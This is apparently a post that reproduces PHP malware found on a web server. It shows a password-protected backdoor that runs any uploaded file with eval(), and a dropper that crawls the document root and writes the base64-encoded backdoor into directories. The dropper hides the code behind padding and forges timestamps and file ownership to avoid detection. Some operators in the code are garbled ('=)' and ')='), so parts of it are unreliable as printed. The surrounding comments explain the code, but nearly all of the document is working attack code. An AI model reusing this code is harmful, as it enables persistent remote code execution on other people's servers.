This is the Malcode, a Backdoor to your Server:
--------------------------------- BASE64CODE ------------------------
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t) { echo "$t\n"; };
function testdata($t) { say(md5("testdata_$t")); };

echo "<pre>";
testdata('start');
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
	{
	if ($code = @fread(@fopen(
		$HTTP_POST_FILES["f"]["tmp_name"],"rb"),
		$HTTP_POST_FILES["f"]["size"]))
		{
		eval($code);
		}
	else
		{
		testdata('f');
		};
	}
else	{
	testdata('pass');
	};
testdata('end');
echo "</pre>"; ?>
--------------------------------- END ------------------------


This is the Just_a_test PHP-code sent once to your Server:

<?php error_reporting(1);
 global $HTTP_SERVER_VARS;
 $START = time();
 $WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);


function my_fwrite($f,$data)
  	{
  	global $CURFILE;
 	$file_mtime = @filemtime($f);
	$file_atime = @fileatime($f);
 	$dir_mtime = @filemtime(@dirname($f));
 	$dir_atime = @fileatime(@dirname($f));
 	if ($file_h = @fopen($f,"wb"))
		{
		@fwrite($file_h,$data);
 		@fclose($file_h);
 		if ($file_mtime)
			{
			@touch($f,$file_mtime,$file_atime);
 			}
		elseif(@filemtime($CURFILE))
			{
			@chmod($f,@fileperms($CURFILE));
			@touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
 			@chgrp($f,@filegroup($CURFILE));
 			@chown($f,@fileowner($CURFILE));
 			};
 		if ($dir_mtime) @touch(@dirname($f),$dir_mtime,$dir_atime);
			return $f;
 		}
	else	{
		return '';
 		};
 	};

 function ext($f)
 	{
	return substr($f, strrpos($f, ".") + 1);
 	};

... scan all your server directories:

function walkdir($p,$func='_walkdir',$l=0)
 	{
	global $START;
 	global $WD_TIMEOUT;
 	global $FL;
 	$func_f = "{$func}_f";
 	$func_d = "{$func}_d";
 	$func_s = "{$func}_s";
 	$func_e = "{$func}_e";
 	if ($dh = @opendir("$p"))
		{
		if (function_exists($func_s))
			{
			if ($func_s($p,$l)) return 1;
 			};
 		while ($f = @readdir($dh))
			{
			if (time() - $START )= $WD_TIMEOUT[$l] ) break;
 			if ($f == '.' || $f == '..' ) continue;
 			if (@is_dir ("$p$f/") ) walkdir("$p$f/",$func,$l+1);
 			if (@is_dir ("$p$f/") && function_exists($func_d)) $func_d("$p$f/",$l);
 			if (@is_file("$p$f" ) && function_exists($func_f)) $func_f("$p$f" ,$l);
 			};
 		closedir($dh);
 		if (function_exists($func_e)) $func_e($p,$l);
 		};
 	};

 function r_cut($p)	{ global $R; return substr($p,strlen($R));  };
 function say($t) 	{ echo "$t\n";  };
 function testdata($t) 	{ say(md5("testdata_$t")); };

 $R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
 $CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
 echo "<pre>";
 testdata('start');
 $fe = ext($CURFILE);
 if (!$fe) $fe = 'php';
 $FN = "namogofer.$fe";

 function _walkdir_s($d,$l)
 	{
	global $FCNT;
 	$FCNT = array('fn' =) '','dir' =) 0,'file' =) 0,'simtype' =) 0);
 	};

 function _walkdir_d($d,$l)
 	{
	global $FCNT;
 	$FCNT['dir' ]++;
 	};

 function _walkdir_f($f,$l)
 	{
	global $FCNT;
 	$FCNT['file']++;
 	if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
 	};






At this point, Just_a_test Zombie-code is written all over your Server:

function _walkdir_e($d,$l)
 	{
	global $C,$FCNT,$FN;
 	if ($C[$l](7)
		{
		if (my_fwrite("$d$FN",
			str_repeat("\n",100)		// Hide Code with 100 empty lines
			.str_repeat(' ',150)		// Hide Code with 150 spaces

			//----------- Malcode is Here: ------------------------------
			.base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+')

			.str_repeat(' ',150)		// Hide Code with 150 spaces
			."\n".str_repeat("\n",100)))	// Hide Code with 100 empty lines
			{
			$C[$l]++;
 			$FCNT['fn'] = r_cut("$d$FN");
 			say(implode("\t",$FCNT));
 			};
 		};
 	};

 walkdir("$R/");
 testdata('end');
 echo "(/pre)";
 ?>